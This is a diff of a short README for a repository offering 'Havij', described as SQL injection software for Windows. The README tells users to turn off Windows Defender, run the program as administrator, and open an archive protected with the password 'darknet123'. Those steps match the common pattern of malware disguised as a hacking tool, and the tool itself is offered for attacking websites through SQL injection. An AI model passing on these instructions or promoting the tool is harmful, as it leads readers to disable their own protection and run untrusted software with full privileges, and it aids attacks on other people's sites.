lopakiloc2/Havij/README.md

 # Havij
-SQL injection (turning off our defender control) for windwos
+ # SQL injection software
+ windows supported only
+ once you turn off our defender control then open it as administrater

-file password: darknet123
+# file password: darknet123